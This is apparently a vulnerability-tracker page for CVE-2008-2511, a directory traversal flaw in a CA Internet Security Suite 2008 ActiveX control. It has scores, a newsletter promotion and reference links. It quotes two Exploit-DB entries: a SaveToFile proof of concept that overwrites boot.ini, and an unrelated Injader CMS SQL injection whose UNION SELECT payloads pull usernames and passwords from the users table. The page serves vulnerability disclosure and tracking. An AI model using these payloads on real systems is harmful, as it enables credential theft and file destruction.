CVE-2008-2511
published 2008-06-02CVE-2008-2511: Directory traversal vulnerability in the UmxEventCli.CachedAuditDataList.1 (aka UmxEventCliLib) ActiveX control in UmxEventCli.dll in CA Internet Security…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
10.01%
95.0th percentile
Directory traversal vulnerability in the UmxEventCli.CachedAuditDataList.1 (aka UmxEventCliLib) ActiveX control in UmxEventCli.dll in CA Internet Security Suite 2008 allows remote attackers to create and overwrite arbitrary files via a .. (dot dot) in the argument to the SaveToFile method. NOTE: this can be leveraged for code execution by writing to a Startup folder. NOTE: some of these details are obtained from third party information.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Injader CMS 2.1.1 - 'id' SQL Injection
exploitdb·2008-12-18
CVE-2008-5890 Injader CMS 2.1.1 - 'id' SQL Injection
Injader CMS 2.1.1 - 'id' SQL Injection
---
Injader CMS
http://www.injader.com/
- (= 2.1.1 -
- SQL -
http://localhost/upload/feeds.php?name=articles&id=
magic_quotes_gpc = Off
register_globals = On
Username (urlencode):
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
Pass:
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758
- Timeline -
Author notified: Nov 30, Dec 09,10
Injader 2.1.2: Dec 12
Public disclosure: Dec 18
- Seasons Greetings -
- http://nukeit.org -
# milw0rm.com [2008-12-18]
Exploit-DB
CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)
exploitdb·2008-05-28
CVE-2008-2511 CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)
CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)
---
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
# milw0rm.com [2008-05-28]
No writeups or analysis indexed.
http://retrogod.altervista.org/9sg_CA_poc.htmlhttp://secunia.com/advisories/30420http://www.securityfocus.com/archive/1/492679/100/0/threadedhttp://www.securitytracker.com/id?1020129http://www.vupen.com/english/advisories/2008/1696/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42712https://www.exploit-db.com/exploits/5682http://retrogod.altervista.org/9sg_CA_poc.htmlhttp://secunia.com/advisories/30420http://www.securityfocus.com/archive/1/492679/100/0/threadedhttp://www.securitytracker.com/id?1020129http://www.vupen.com/english/advisories/2008/1696/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42712https://www.exploit-db.com/exploits/5682
2008-06-02
Published